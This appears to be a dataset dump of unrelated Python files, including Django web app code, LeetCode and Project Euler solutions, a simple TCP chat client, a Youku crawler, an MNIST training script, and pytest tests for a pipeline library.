text stringlengths 8 6.05M |
|---|
###########################
# project_euler number 3
# by 김승현
###########################
# Q. Find the largest prime factor of N.
#
# Strip factors off N smallest-first; each divisor that ever divides N
# is prime, and the divisor left when N reaches 1 is the largest one.
N = 600851475143
div = 2
# Trial division.  Floor division (//) keeps N an exact int; the
# original used true division (/), which turns N into a float in
# Python 3 and can lose precision for large values.
while N != 1:
    if N % div == 0:
        N //= div
    else:
        div = div + 1
print(div)
def double_every_other(lst):
    """Return a copy of *lst* in which every second element, counting
    from the left (i.e. the elements at odd indexes), is doubled."""
    doubled = []
    for idx, value in enumerate(lst):
        doubled.append(value * 2 if idx % 2 else value)
    return doubled
|
# -*- coding:utf-8 -*-
import os
import glob
current_path = os.path.dirname(os.path.realpath(__file__))
def storage_path(file_path=""):
return os.path.join(base_path("storage"), file_path)
def base_path(file_path=""):
return os.path.join(current_path, file_path)
def get_faces():
    """Return the paths of all face JPEGs under ``storage/images/faces``.

    Builds the pattern with os.path.join instead of the original
    hard-coded ``"images\\faces\\*.jpg"`` so the glob also matches on
    POSIX systems, where a backslash is not a path separator.
    """
    return glob.glob(storage_path(os.path.join("images", "faces", "*.jpg")))
def get_dlib_model(model_file_name):
    """Return the absolute path of *model_file_name* inside
    ``storage/model``."""
    model_dir = storage_path("model")
    return os.path.join(model_dir, model_file_name)
# Manual smoke test: print a sample base path and storage path.
if __name__ == '__main__':
    print(base_path("asd"))
    print(storage_path("asd"))
|
from django.http.response import HttpResponse
from django.shortcuts import redirect, render
from meetups.admin import MeetupAdmin
from .forms import RegistrationForm
from .models import Meetup, Participant
# Create your views here.
def index(request):
    """Render the meetup list page with every Meetup in the database."""
    all_meetups = Meetup.objects.all()
    context = {
        'show_meetups': True,
        'meetups': all_meetups,
    }
    return render(request, 'meetups/index.html', context)
def details(request, meetup_slug):
    """Show one meetup and handle participant registration.

    GET renders an empty registration form; a valid POST adds the
    participant (creating the Participant record if needed) and
    redirects to the confirmation page.  An unknown slug renders the
    "not found" state.
    """
    try:
        selected_meetup = Meetup.objects.get(slug=meetup_slug)
    except Meetup.DoesNotExist:
        # Only a missing meetup means "not found".  The original caught
        # every Exception here, which silently swallowed form, redirect
        # and database errors as well.
        return render(request, 'meetups/meetup-details.html',
                      {'meetup': None, 'meetup_found': False})
    # Default to an unbound form so non-POST methods (GET, HEAD, ...)
    # never hit an unbound-local error.
    registration_form = RegistrationForm()
    if request.method == "POST":
        registration_form = RegistrationForm(request.POST)
        if registration_form.is_valid():
            participant_username = registration_form.cleaned_data['username']
            participant_email = registration_form.cleaned_data['email']
            # get_or_create replaces the original get / bare-except /
            # create sequence and is race-safe at the DB level.
            participant, _created = Participant.objects.get_or_create(
                username=participant_username,
                defaults={'email': participant_email})
            selected_meetup.participant.add(participant)
            return redirect('confirmation', meetup_slug=meetup_slug)
    return render(request, 'meetups/meetup-details.html', {
        'meetup': selected_meetup,
        'meetup_found': True,
        'form': registration_form,
    })
def confirmation(request, meetup_slug):
    """Render the registration-success page for the given meetup."""
    selected = Meetup.objects.get(slug=meetup_slug)
    context = {'organizer_email': selected.organizer_email}
    return render(request, 'meetups/registration-success.html', context)
|
'''
1. 首先需要丢弃字符串前面的空格;
2. 然后可能有正负号(注意只取一个,如果有多个正负号,那么说这个字符串是无法转换的,返回0 比如测试用例里就有个“+-2”);
3. 字符串可以包含0~9以外的字符,如果遇到非数字字符,那么只取该字符之前的部分,如“-00123a66”返回为“-123”;
4. 如果超出int的范围,返回边界值(2147483647或-2147483648)。
5. 注意字符转化为整数的方法, digit = ord(str[i]) - ord('0') 此点一定要记住
'''
class Solution:
    def myAtoi(self, str: str) -> int:
        """String-to-integer (LeetCode atoi).

        Leading whitespace is stripped, at most one sign is honoured,
        digits are consumed until the first non-digit, and the result
        is clamped to the signed 32-bit range.
        """
        INT_MAX = 2 ** 31 - 1
        INT_MIN = -(2 ** 31)
        str = str.strip()  # drop surrounding whitespace first
        if not str:
            return 0
        negative = str[0] == '-'
        start = 1 if str[0] in '+-' else 0
        result = 0
        for ch in str[start:]:
            digit = ord(ch) - ord('0')  # char -> numeric value
            if digit < 0 or digit > 9:
                # First non-digit ends the number (e.g. "-00123a66").
                break
            if negative:
                result = result * 10 - digit
                if result < INT_MIN:
                    return INT_MIN
            else:
                result = result * 10 + digit
                if result > INT_MAX:
                    return INT_MAX
        return result
import sys, os
from socket import *
# Simple TCP chat client.  After connecting it forks: the parent
# process prints everything the server sends while the child forwards
# the user's keyboard input to the server.  The word "salir" (on
# either side) ends the session.
if len(sys.argv) > 2:
    host = sys.argv[1]
    port = int(sys.argv[2])
else:
    print("Unable to create connection, required parameters 'Host' and/or 'Port' where not provided")
    sys.exit(1)
server_address = gethostbyname(host)
connection_socket = socket(AF_INET, SOCK_STREAM)
connection_socket.connect((server_address, port))
pid = os.fork()
if pid != 0:
    # Parent: reader loop.  readline() keeps the trailing newline, so
    # the sentinel here is "salir\n".
    incoming_stream = connection_socket.makefile("r")
    print("Client - Client is accepting server messages")
    while True:
        msg = incoming_stream.readline()
        print(msg)
        if msg == "salir\n":
            break
    incoming_stream.close()
    connection_socket.close()
    print("Server disconnected, if you are not disconnected type 'salir'")
    os.waitpid(pid, 0)
else:
    # Child: writer loop.
    outgoing_stream = connection_socket.makefile("w")
    print("Client - Server is accepting client messages")
    while True:
        msg = input()
        outgoing_stream.write(msg + "\n")
        outgoing_stream.flush()
        # BUG FIX: input() never includes a trailing newline, so the
        # original comparison against "salir\n" could never be true and
        # the child never terminated.
        if msg == "salir":
            break
    outgoing_stream.close()
    connection_socket.close()
    sys.exit(0)
|
from flask import Flask, g, current_app
from flask_sqlalchemy import SQLAlchemy
from . import config

# Application and database singletons shared by the whole package.
app = Flask(__name__)
db = SQLAlchemy()

def create_app():
    """Application factory: load config, bind the database, register
    all blueprints and create the tables.

    Returns the configured Flask application.  Note the ordering:
    init_app must precede the app_context block, and create_all must
    run after the blueprint imports so all models are registered.
    """
    app.config.from_object(config.Config)
    db.init_app(app)
    with app.app_context():
        # Imports are done here (not at module top) to avoid circular
        # imports between the blueprints and this module.
        from resourse.api import courseBp, fileBp, authBp, checkBp
        app.register_blueprint(courseBp.coursebp)
        app.register_blueprint(authBp.authbp)
        app.register_blueprint(fileBp.filebp)
        app.register_blueprint(checkBp.checkbp)
        # Create tables for our models
        db.create_all()
    return app
|
# coding=utf-8
from mongo_YouKu import MongoUrlManager
from crawler_YouKu import Crawler_YouKu
import time
import os

# Breadth-first crawl of Youku category pages backed by a MongoDB URL
# queue.  depth 0 = category root page, depth 1 = per-region pages,
# depth 2 = per-type pages whose movie names are written to text files.
mongo_mgr = MongoUrlManager()
root_url = "https://list.youku.com/category/show/c_100.html"
mongo_mgr.enqueueUrl(root_url, 0)
while True:
    record = mongo_mgr.dequeueUrl()
    if record == None:
        # Queue drained: nothing left to crawl ("database empty, exiting").
        print("数据库为空, 程序退出")
        break
    url = record['url']
    depth = record['depth']
    crawler = Crawler_YouKu(url)
    if depth == 0:
        # Root page: collect region links, queue them at depth 1.
        crawler.get_label_1()
        for href, region in crawler.label_1_List:
            mongo_mgr.enqueueUrl(href, 1, region)
        mongo_mgr.finishUrl(url)
    elif depth == 1:
        # Region page: collect type links, queue them at depth 2.
        region = record['region']
        crawler.get_label_2()
        for href, type in crawler.label_2_List:
            mongo_mgr.enqueueUrl(href, 2, region, type)
        mongo_mgr.finishUrl(url)
    elif depth == 2:
        # Leaf page: dump the movie names to <region>_<type>.txt and
        # mirror each name into Mongo.
        region = record["region"]
        type = record["type"]
        fileTmp = region + "_" + type + ".txt"
        fileDir = os.path.join("优酷_Corpus", "动漫")
        if not os.path.exists(fileDir):
            os.makedirs(fileDir)
        fileName = os.path.join(fileDir, fileTmp)
        crawler.get_movieName()
        with open(fileName, "w", encoding="utf-8") as fw:
            for name in crawler.contents:
                fw.write(name + "\n")
                mongo_mgr.enqueueItems(region, type, name)
        crawler.close_driver()
    # Throttle requests a little between queue items.
    time.sleep(0.2)
|
# Generated by Django 3.0.6 on 2020-05-24 16:15
from django.db import migrations, models

class Migration(migrations.Migration):
    # Auto-generated schema migration: adds Keyword.today and redefines
    # Keyword.is_show.  Change the schema via new migrations rather
    # than by editing this file.
    dependencies = [
        ('main', '0003_auto_20200521_1203'),
    ]
    operations = [
        migrations.AddField(
            model_name='keyword',
            name='today',
            field=models.BooleanField(default=False, verbose_name='오늘만 보이게 하려면 체크'),
        ),
        migrations.AlterField(
            model_name='keyword',
            name='is_show',
            field=models.BooleanField(default=False, verbose_name='다른 제시어 표시 변수, 건드리지 말자'),
        ),
    ]
|
# Sort on the first coordinate; the problem then reduces to a Longest
# Increasing Subsequence over pair chains (O(n^2) DP).
class Solution:
    def findLongestChain(self, pairs: List[List[int]]) -> int:
        """Length of the longest chain where each pair's start strictly
        exceeds the previous pair's end.  Sorts *pairs* in place."""
        pairs.sort(key=lambda p: (p[0], p[1]))
        count = len(pairs)
        best = [1] * count
        for hi in range(count):
            best[hi] = max(
                [best[lo] + 1 for lo in range(hi) if pairs[hi][0] > pairs[lo][1]],
                default=1,
            )
        return max(best)
# Sort by the second coordinate; since every pair's first element is
# smaller than its second, a greedy scan (always finish the link that
# ends earliest) is optimal.
class Solution:
    def findLongestChain(self, pairs: List[List[int]]) -> int:
        """Greedy O(n log n) variant: count pairs whose start strictly
        exceeds the end of the last pair taken.  Sorts *pairs* in place;
        assumes at least one pair."""
        pairs.sort(key=lambda p: p[1])
        chain_len = 1
        last_end = pairs[0][1]
        for cur in pairs[1:]:
            if cur[0] > last_end:
                chain_len += 1
                last_end = cur[1]
        return chain_len
class Solution:
    def minimalKSum(self, nums: List[int], k: int) -> int:
        """Minimum possible sum of k distinct positive integers that do
        not appear in *nums*.

        Scans the sorted array and greedily takes the smallest missing
        integers out of each gap, summing each run with the arithmetic
        series formula.  Sorts *nums* in place.
        """
        nums.sort()
        taken, total = 0, 0
        prev = 0
        for value in nums:
            if taken == k:
                break
            if value > prev + 1:
                # Gap (prev, value): take up to k - taken integers
                # prev+1 .. prev+count from it.
                count = min(value - prev - 1, k - taken)
                taken += count
                total += (prev + 1 + prev + count) * count // 2
            prev = value
        if taken < k:
            # Still short: take the integers just above the largest num.
            remaining = k - taken
            total += (nums[-1] + 1 + nums[-1] + remaining) * remaining // 2
        return total
#!/usr/bin/env python
import logging
import theano
from argparse import ArgumentParser
from theano import tensor
from blocks.algorithms import GradientDescent, Adam
from blocks.bricks import MLP, Identity, Sigmoid, Softmax
from blocks.bricks.cost import CategoricalCrossEntropy, MisclassificationRate
from blocks.initialization import Uniform, IsotropicGaussian, Constant
from fuel.streams import DataStream
from fuel.datasets import MNIST
from fuel.schemes import SequentialScheme
from fuel.transformers import Mapping
from blocks.graph import ComputationGraph
from blocks.model import Model
from blocks.extensions import FinishAfter, Timing, Printing
from blocks.extensions.monitoring import (DataStreamMonitoring,
TrainingDataMonitoring)
from blocks.extensions.plot import Plot
from blocks.main_loop import MainLoop
from blocks_contrib.bricks.filtering import SparseFilter, VarianceComponent
from blocks_contrib.extensions import DataStreamMonitoringAndSaving
from blocks_contrib.utils import batch_normalize
# Load the raw training images once so the per-batch transformer below
# can subtract the dataset mean.
mnist = MNIST('train', sources=['features'])
data, _ = mnist._load_mnist()
means = data.mean(axis=0)

def _meanize(data):
    # Mean-center the features; the targets (data[1]) pass through
    # unchanged.  `data` is a (features, targets) batch tuple.
    newfirst = data[0] - means[None, :]
    return (newfirst, data[1])
def main(save_to, num_epochs):
    """Train a SparseFilter + VarianceComponent feature extractor with
    an MLP classifier on mean-centered MNIST, monitoring test/valid
    streams and saving the best model to ``'best_' + save_to + '.pkl'``.
    """
    dim = 400
    n_steps = 100
    batch_size = 100
    # First sparse-filtering layer over the raw 784-pixel images.
    filtering = SparseFilter(dim=dim, input_dim=784, batch_size=batch_size, n_steps=n_steps,
                             weights_init=IsotropicGaussian(.01), biases_init=Constant(0.))
    filtering.initialize()
    # Higher "variance component" layer driven by the first layer's code.
    causes = VarianceComponent(dim=9, input_dim=dim, n_steps=n_steps, batch_size=batch_size,
                               layer_below=filtering,
                               weights_init=IsotropicGaussian(.01),  # Uniform(.1, .001),
                               use_bias=False)
    causes.initialize()
    clf = MLP([Sigmoid(), Softmax()], [dim, dim, 10],
              weights_init=IsotropicGaussian(0.01),
              use_bias=False, name="clf")
    clf.initialize()
    x = tensor.matrix('features')
    y = tensor.lmatrix('targets')
    # Two passes: the first computes rec_2, the second feeds it back as
    # a gradient-disconnected gamma modulation of the filtering cost.
    cost1, code_1, rec_1 = filtering.cost(inputs=x, prior=0)
    cost2, code_2, rec_2 = causes.cost(prev_code=code_1, prior=0)
    cost1, code_1, rec_1 = filtering.cost(inputs=x, prior=0,
                                          gamma=theano.gradient.disconnected_grad(rec_2))
    cost2, code_2, rec_2 = causes.cost(prev_code=code_1, prior=0)
    # 0*y.sum() keeps 'targets' in the graph so the monitored streams
    # (which provide both sources) type-check.
    cost = cost1 + cost2 + 0*y.sum()
    probs = clf.apply(code_1)
    nll = CategoricalCrossEntropy().apply(y.flatten(), probs)
    clf_error_rate = MisclassificationRate().apply(y.flatten(), probs)
    cost += nll
    cost.name = 'final_cost'
    cg = ComputationGraph([cost, clf_error_rate])
    new_cg = cg
    # new_cg = batch_normalize(clf.linear_transformations, cg)
    mnist_train = MNIST("train", stop=50000)
    mnist_valid = MNIST("train", start=50000, stop=60000)
    mnist_test = MNIST("test")
    trainstream = Mapping(DataStream(mnist_train,
                          iteration_scheme=SequentialScheme(
                              mnist_train.num_examples, 100)),
                          _meanize)
    teststream = Mapping(DataStream(mnist_test,
                         iteration_scheme=SequentialScheme(
                             mnist_test.num_examples, 100)),
                         _meanize)
    # NOTE(review): the validation scheme is sized with
    # mnist_test.num_examples -- looks like it should be
    # mnist_valid.num_examples; confirm before relying on valid stats.
    validstream = Mapping(DataStream(mnist_valid,
                          iteration_scheme=SequentialScheme(
                              mnist_test.num_examples, 100)),
                          _meanize)
    algorithm = GradientDescent(
        cost=new_cg.outputs[0], params=new_cg.parameters,
        step_rule=Adam())
    main_loop = MainLoop(
        algorithm,
        trainstream,
        extensions=[Timing(),
                    FinishAfter(after_n_epochs=num_epochs),
                    DataStreamMonitoring(
                        new_cg.outputs,
                        teststream,
                        prefix="test"),
                    DataStreamMonitoringAndSaving(
                        new_cg.outputs,
                        validstream,
                        [filtering, causes, clf],
                        'best_'+save_to+'.pkl',
                        cost_name='error_rate',
                        after_epoch=True,
                        prefix='valid'
                    ),
                    TrainingDataMonitoring(
                        new_cg.outputs,
                        prefix="train",
                        after_epoch=True),
                    # Plot(
                    #     save_to,
                    #     channels=[
                    #         ['test_final_cost',
                    #          'test_misclassificationrate_apply_error_rate'],
                    #         ['train_total_gradient_norm']]),
                    Printing()])
    main_loop.run()
# CLI entry point: parse the save destination and epoch count, then train.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    parser = ArgumentParser("An example of training an MLP on"
                            " the MNIST dataset.")
    parser.add_argument("--num-epochs", type=int, default=2,
                        help="Number of training epochs to do.")
    parser.add_argument("save_to", default="mnist.pkl", nargs="?",
                        help=("Destination to save the state of the training "
                              "process."))
    args = parser.parse_args()
    main(args.save_to, args.num_epochs)
|
from __future__ import unicode_literals
from django.db import models
from .member import Member
from rest_framework.exceptions import NotFound
# Create your models here.
class Item(models.Model):
    """A lost/found item uploaded by a Member."""
    uploaded_by = models.ForeignKey(Member, on_delete=models.CASCADE)
    item_name = models.CharField(max_length=200, null=True)
    item_category = models.CharField(max_length=200, default="")
    is_found = models.BooleanField(default=False)
    item_image = models.ImageField()

    def __str__(self):
        return self.item_name

    @classmethod
    def get_item_obj(cls, id):
        """Return the Item with the given id, or raise DRF NotFound."""
        try:
            return cls.objects.get(id=id)
        except cls.DoesNotExist:
            raise NotFound("Item not found")

    @classmethod
    def create_item(cls, item_name, item_category, uploaded_by, image):
        """Create and return a new Item for the member named *uploaded_by*.

        Raises NotFound if no such member exists.  The original caught
        ``cls.DoesNotExist`` (i.e. Item.DoesNotExist), but the lookup
        that can actually fail here is ``Member.objects.get``, which
        raises ``Member.DoesNotExist`` -- so the failure was never
        translated into a NotFound response.
        """
        try:
            return cls.objects.create(
                item_name=item_name,
                item_category=item_category,
                uploaded_by=Member.objects.get(username=uploaded_by),
                item_image=image,
            )
        except Member.DoesNotExist:
            raise NotFound("Member not found")

    @classmethod
    def get_item_details(cls, id):
        """Return a dict holding the item's image, or raise NotFound."""
        try:
            item_obj = cls.objects.get(id=id)
            return {"image": item_obj.item_image}
        except cls.DoesNotExist:
            # Fixed message: this lookup is for an Item, not a User.
            raise NotFound("Item not found")
|
"""Tests for ``tinyflow.ops``."""
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import inspect
import operator as op
import os
import pytest
from tinyflow import _testing, exceptions, ops, Pipeline, tools
def test_default_description():
    # With no explicit description an operation falls back to its repr.
    tform = ops.flatten()
    assert repr(tform) == tform.description

def test_description():
    # `'text' >> op` attaches a human-readable description.
    tform = 'description' >> ops.flatten()
    assert tform.description == 'description'

def test_Operation_abc():
    """An operation without ``__call__()`` is invalid."""
    with pytest.raises(NotImplementedError):
        ops.Operation()([])

@pytest.mark.parametrize("pool", ['thread', 'process'])
def test_Operation_no_pool(pool):
    # Requesting a pool from a pipeline that was never given one must
    # raise ``exceptions.NoPool``.
    class Op(ops.Operation):
        def __init__(self, pool):
            self._pool = pool
        def __call__(self, stream):
            if self._pool == 'process':
                self.pipeline.process_pool
            elif self._pool == 'thread':
                self.pipeline.thread_pool
            else:
                raise RuntimeError('uh ...')
    p = Pipeline() | Op(pool)
    with pytest.raises(exceptions.NoPool):
        p([])

def test_Operation_no_pipeline():
    # Touching ``self.pipeline`` before the operation has joined a
    # pipeline raises ``exceptions.NoPipeline``.
    class Op(ops.Operation):
        def __init__(self):
            self.pipeline
        def __call__(self, stream):
            pass
    with pytest.raises(exceptions.NoPipeline):
        Op()
# Table-driven checks: each (operation, input, expected) triple below is
# pushed through ``test_basic_operation`` and compared as tuples.
@pytest.mark.parametrize("operation,input_data,expected", [
    (ops.chunk(2),
     (1, 2, 3, 4),
     ((1, 2), (3, 4))),
    (ops.chunk(2),
     (1, 2, 3, 4, 5),
     ((1, 2), (3, 4), (5,))),
    (ops.counter(),
     (1, 1, 2, 2, 4, 4, 5),
     ((1, 2), (2, 2), (4, 2), (5, 1))),
    (ops.counter(3),
     (1, 1, 2, 2, 4, 4, 5),
     ((1, 2), (2, 2), (4, 2))),
    (ops.drop(2),
     range(5),
     (2, 3, 4)),
    (ops.flatten(),
     ((1, 2), (3, 4)),
     (1, 2, 3, 4)),
    (ops.filter(),
     (0, 1, 2, None, 4),
     (1, 2, 4)),
    (ops.filter(filterfalse=True),
     (0, 1, 2, None, 4),
     (0, None)),
    (ops.filter(bool),
     (0, 1, 2, None, 4),
     (1, 2, 4)),
    (ops.itemgetter(0),
     ((0, 1), (1, 2)),
     (0, 1)),
    (ops.itemgetter(slice(1, 3)),
     ((0, 1, 2, 3), (4, 5, 6, 7)),
     ((1, 2), (5, 6))),
    (ops.map(lambda x: x ** 2),
     (2, 4, 8),
     (4, 16, 64)),
    (ops.map(op.methodcaller('upper'), flatten=True),
     ['w1', 'w2'],
     ['W', '1', 'W', '2']),
    (ops.methodcaller('split', ',', 1),
     ('a,b,c', 'a'),
     (['a', 'b,c'], ['a'])),
    (ops.windowed_op(2, reversed),
     (1, 2, 3, 4, 5),
     (2, 1, 4, 3, 5)),
    (ops.windowed_reduce(2, op.iadd),
     (1, 2, 3, 4, 5),
     (3, 7, 5)),
    (ops.sort(),
     (2, 3, 1),
     (1, 2, 3)),
    (ops.sort(reverse=True),
     (2, 3, 1),
     (3, 2, 1)),
    (ops.sort(key=op.itemgetter(0), reverse=True),
     ((1, 'dog'), (3, 'cat'), (2, 'fish')),
     ((3, 'cat'), (2, 'fish'), (1, 'dog'))),
    (ops.take(2),
     range(5),
     (0, 1)),
    (ops.wrap(reversed),
     (1, 2, 3),
     (3, 2, 1))])
def test_basic_operation(operation, input_data, expected):
    """A lot of operations take few arguments are generate an only slightly
    altered output. Output and expected values are compared as tuples.
    """
    assert isinstance(operation, ops.Operation)
    assert tuple(operation(input_data)) == tuple(expected)
def test_reduce_by_key_exceptions():
    # copy_initial and deepcopy_initial are mutually exclusive.
    with pytest.raises(ValueError):
        ops.reduce_by_key(
            None, None, copy_initial=True, deepcopy_initial=True)

@pytest.mark.parametrize('initial', [tools.NULL, 0, 10])
def test_reduce_by_key_wordcount(initial):
    """Tests ``keyfunc``, ``valfunc``, and ``initial``."""
    data = ['word', 'something', 'else', 'word']
    expected = {
        'word': 2,
        'something': 1,
        'else': 1
    }
    if initial != tools.NULL:
        # A concrete initial value offsets every count.
        expected = {k: v + initial for k, v in expected.items()}
    o = ops.reduce_by_key(
        op.iadd,
        lambda x: x,
        valfunc=lambda x: 1,
        initial=initial)
    assert expected == dict(o(data))

@pytest.mark.parametrize('kwargs', (
    {'copy_initial': True},
    {'deepcopy_initial': True}))
def test_reduce_by_key_initial_copier(kwargs):
    # Each key must get its own (deep)copy of the mutable initial
    # value; otherwise the [None] list below would be shared and both
    # keys would accumulate into the same list.
    data = [
        ['key1', 1],
        ['key', 1],
        ['key', 2],
    ]
    expected = {
        'key1': [None, 'key1', 1],
        'key': [None, 'key', 1, 'key', 2]
    }
    o = ops.reduce_by_key(
        op.iadd,
        op.itemgetter(0),
        initial=[None],
        **kwargs)
    actual = dict(o(data))
    assert expected == actual
def _parametrize_test_map_star_args(pools, args):
"""Prepare parametrized arguments for ``test_map_star_args()`` to make
sure everything is tested across all pool types.
Takes args like:
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7])
and pools like:
[(ProcessPoolExecutor, 'process'), (ThreadPoolExecutor, 'thread')]
and produces:
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7], ProcessPoolExecutor, 'process')
(_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7], ThreadPoolExecutor, 'thread')
"""
for item in args:
for p in pools:
yield tuple(list(item) + list(p))
@pytest.mark.parametrize("func,argtype,data,expected,pool_class,pool_name",
    list(_parametrize_test_map_star_args(
        pools=[(ProcessPoolExecutor, 'process'), (ThreadPoolExecutor, 'thread')],
        args=[
            (_testing.add2, '*args', [(1, 2), (3, 4)], [3, 7]),
            (_testing.add2, '**kwargs', [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}], [3, 7]),
            (_testing.add4, '*args**kwargs', [((1, 2), {'c': 3, 'd': 4}), ((5, 6), {'c': 7, 'd': 8})], [10, 26])
        ])))
def test_map_arg_types_and_pools(
        func, argtype, data, expected, pool_class, pool_name):
    """Every argument type should work with every pool type."""
    p = Pipeline() | ops.map(func, argtype=argtype, pool=pool_name)
    with pool_class(4) as pool:
        kwargs = {'{}_pool'.format(pool_name): pool}
        actual = p(data, **kwargs)
        # Cast both outputs to list and sort actual since it may be out of
        # order after mapping in parallel.
        assert list(expected) == sorted(actual)

def test_map_exceptions():
    # Bad argtype
    with pytest.raises(ValueError):
        ops.map(lambda x: x, argtype=None)
    # Bad pool
    p = Pipeline() | ops.map(lambda x: x, pool='trash')
    with pytest.raises(ValueError):
        p([])

def test_cat():
    # ops.cat() streams file contents line by line, like $ cat.
    with open('LICENSE.txt') as f:
        for e, a in zip(f, ops.cat()(['LICENSE.txt'])):
            assert e == a

def test_module_all():
    """Make sure all the operations are registered in
    ``tinyflow.ops.__all__``.
    This test may need to be modified if any objects that don't subclass
    ``tinyflow.ops.Operation()`` are added to this module.
    """
    # Ensure everything in '__all__' is present
    for item in ops.__all__:
        assert issubclass(getattr(ops, item), ops.Operation)
    # Ensure all 'Operation()' subclasses are listed in '__all__'.
    for cls in ops.Operation.__subclasses__():
        if os.path.join('tinyflow/tests') in inspect.getfile(cls):
            continue
        assert cls.__name__ in ops.__all__
|
from django.db.models.signals import post_save  # apps ability to save new users
from django.contrib.auth.models import User
from django.dispatch import receiver  # making receiver
from .models import Profile  # when we make a user, make a profile

@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
    """Create a matching Profile whenever a new User is saved.

    Connected to ``post_save`` for ``User``: *instance* is the saved
    user and *created* is True only on the first save, so exactly one
    Profile is created per user.
    """
    if created:
        Profile.objects.create(user=instance)

@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
    """Persist the related Profile every time its User is saved."""
    instance.profile.save()
|
def check(string):
    """Count positions where the pattern ``'abacaba'`` starts in
    *string*.  Works on either a str or a list of characters, and
    counts overlapping occurrences."""
    pattern = 'abacaba'
    total = 0
    for start in range(len(string) - 6):
        if all(string[start + k] == pattern[k] for k in range(7)):
            total += 1
    return total
# For each of t test cases: try to replace the '?' wildcards in s so
# that the pattern 'abacaba' occurs exactly once; print "Yes" and the
# filled string when possible, otherwise "No".
t = int(input())
while t > 0:
    pat = 'abacaba'
    n = int(input())
    s = str(input())
    flag = 0
    for i in range(0,n-6,+1):
        # Try forcing an occurrence of the pattern at position i.
        ss = list(s)
        cur = 1
        for j in range(7):
            if ss[i+j] != '?' and ss[i+j] != pat[j]:
                cur = 0
                break
            else:
                ss[i+j] = pat[j]
        # Accept this placement only if it yields exactly one occurrence;
        # remaining '?' are filled with 'z' (which cannot create more).
        if cur == 1 and check(ss) == 1:
            for k in range(len(s)):
                if ss[k] == '?':
                    ss[k] = 'z'
            flag = 1
            print("Yes")
            print(''.join(ss))
    if flag == 0:
        print("No")
    t = t-1
|
import unittest
from Data_work import *
class tests(unittest.TestCase):
    """Unit tests for Data_work.test_grades."""

    def test_grade_func(self):
        # assertEqual replaces the long-deprecated assertEquals alias,
        # which was removed in Python 3.12.
        self.assertEqual(0, test_grades(['A', 'A', 'A', 'A']))
        self.assertEqual(-1, test_grades(['A', 'B', 'C']))
        self.assertEqual(1, test_grades(['C', 'A', 'B']))
        self.assertEqual(0, test_grades(['A']))
|
import uuid
from django.db import models
from django.contrib.auth.models import User
from basketball.models import GAME_TYPES, SCORE_TYPES, Season
# Permission levels a user can hold on a Group (stored value, label).
PERMISSION_TYPES = [
    ('read', 'Read'),
    ('edit', 'Edit'),
    ('admin', 'Admin')
]

class Group(models.Model):
    """A basketball group: membership, default game settings and
    leaderboard qualification thresholds."""
    name = models.CharField(max_length=60, blank=False)
    admin = models.ManyToManyField('auth.User', related_name='admin_groups', blank=True)
    members = models.ManyToManyField('auth.User', related_name='member_groups', blank=True)
    # default game settings
    game_type = models.CharField(max_length=30, choices=GAME_TYPES, null=True)
    score_type = models.CharField(max_length=30, choices=SCORE_TYPES, null=True)
    ft_enabled = models.BooleanField(help_text="Enable FT tracking", default=False)
    points_to_win = models.CharField(max_length=30, choices=(('11','11'), ('30','30'), ('other','Other')), default='other', null=True)
    team1_name = models.CharField(max_length=64, blank=False, default="Away")
    team2_name = models.CharField(max_length=64, blank=False, default="Home")
    #leaderboard settings
    possessions_min = models.PositiveIntegerField(default=100)
    fga_min = models.PositiveIntegerField(default=15)

    def __str__(self):
        return "%s" % (self.name)

    def checkUserPermission(self, user, permission):
        """Return True if *user* holds *permission* on this group.

        User id 1 is treated as a superuser; anonymous users are
        always denied.
        """
        # Always approve the 'master' user
        if user.id == 1:
            return True
        if user.is_anonymous:
            return False
        for group_permission in user.group_permissions.all():
            if group_permission.group_id == self.id and group_permission.permission == permission:
                return True
        return False

    def getSeasons(self):
        """Return the Seasons (newest first) during which this group
        played at least one game."""
        group_season_pks = []
        for season in Season.objects.all():
            if self.game_set.filter(date__range=(season.start_date, season.end_date)):
                group_season_pks.append(season.id)
        seasons = Season.objects.filter(pk__in=group_season_pks).order_by('-start_date')
        return seasons
class MemberPermission(models.Model):
    """Grants one user a single permission level on one group,
    optionally linked to the Player they appear as."""
    group = models.ForeignKey(Group, on_delete=models.CASCADE, blank=True, null=True)
    user = models.ForeignKey('auth.User', on_delete=models.CASCADE, related_name='group_permissions')
    permission = models.CharField(max_length=30, choices=PERMISSION_TYPES, null=True)
    player = models.ForeignKey('basketball.Player', on_delete=models.CASCADE, blank=True, null=True)

    def __str__(self):
        return "%s - %s" % (self.group.name, self.user.username)

    class Meta():
        # At most one permission row per (group, user) pair.
        unique_together = ("group", "user")
class MemberProfile(models.Model):
    """Member profile is used to store some more information about the users"""
    user = models.OneToOneField('auth.User', on_delete=models.CASCADE, editable=False)
    # 5-character postal code.  NOTE: the field name shadows the
    # builtin ``zip`` inside this class body.
    zip = models.CharField(max_length=5,null=True)

    def __str__(self):
        return "%s - %s" % (self.user.username,self.user.last_name)

    #def get_absolute_url(self):
    #    return reverse("profile_stats",kwargs={'id':self.id})
    #def save(self,*args,**kwargs):
    #    super(MemberProfile,self).save(*args,**kwargs)
class MemberInvite(models.Model):
    """An emailed invitation to join a group; ``code`` is the UUID
    token embedded in the invite link."""
    group = models.ForeignKey('base.Group', on_delete=models.CASCADE)
    email = models.EmailField()
    permission = models.CharField(max_length=30, choices=PERMISSION_TYPES, null=True)
    # Player pk stored as a plain integer rather than a ForeignKey.
    player = models.PositiveIntegerField(blank=True, null=True)
    code = models.UUIDField(default=uuid.uuid4, editable=False)
    active = models.BooleanField(default=True)
    creation_date = models.DateField(auto_now_add=True, null=True)

    def __str__(self):
        return "%s - %s" % (self.group.name, self.email)
class Contact(models.Model):
    """A message submitted through the site's contact form; ``user`` is
    set when the sender was logged in."""
    creation_date = models.DateField(auto_now_add=True, null=True, blank=True)
    user = models.ForeignKey('auth.User', on_delete=models.CASCADE, null=True, blank=True)
    email = models.EmailField()
    subject = models.CharField(max_length=120)
    message = models.TextField()

    def __str__(self):
        return "%s - %s" % (self.creation_date, self.email)
|
# -*- coding: utf-8 -*-
import base64
import hmac
import hashlib
import json
import urllib
import urllib2
from datetime import datetime as dt
